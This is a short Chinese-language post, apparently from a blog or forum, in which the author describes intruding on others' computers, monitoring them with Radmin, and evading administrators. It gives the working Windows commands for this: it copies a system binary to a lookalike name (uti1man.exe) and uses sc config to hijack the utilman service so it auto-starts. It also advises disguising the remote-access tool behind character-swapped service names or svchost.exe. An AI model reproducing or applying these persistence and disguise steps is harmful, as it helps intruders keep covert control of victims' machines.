|
好久没有所谓技术性的东西了,最近进人家的机器用Radmin监视人家发现现在一般的网管都会检查用户和进程(不过那个任务管理器不知道为什么不能用了,知道有木马都杀不了,不知道Windows怎么搞的),所以手脚就要在这个上面做了。 先自己详细的看下默认的Windows服务
替换或者时注意的问题
1 依存关系 2 二进制路径 3 默认启动还是自动
我靠,还可以在服务管理器里更改说明。
C:\WINNT\system32>copy termsrv.exe .\uti1man.exe copy termsrv.exe .\uti1man.exe 已复制 1 个文件。
C:\WINNT\system>sc config utilman start= auto sc config utilman start= auto [SC] ChangeServiceConfig SUCCESS
C:\WINNT\system>sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe [SC] ChangeServiceConfig SUCCESS
至于该替换哪个,我不说啊。最郁闷的是那个Performance Logs and Alerts 和c:\winnt\system\smlogsvc.exe /service 替换Radmin后,明明是禁止的,可是居然端口还等着连接。汗! 只要条件符合,几乎发现不了,除非也是高手。还有就是名字的要求,i与1与l,o与0,呵呵~~ 自己发挥啊,很多的svchost.exe也没有人会怀疑吧~~~
说这么多了,自己研究去,很好玩的啊~~~~
|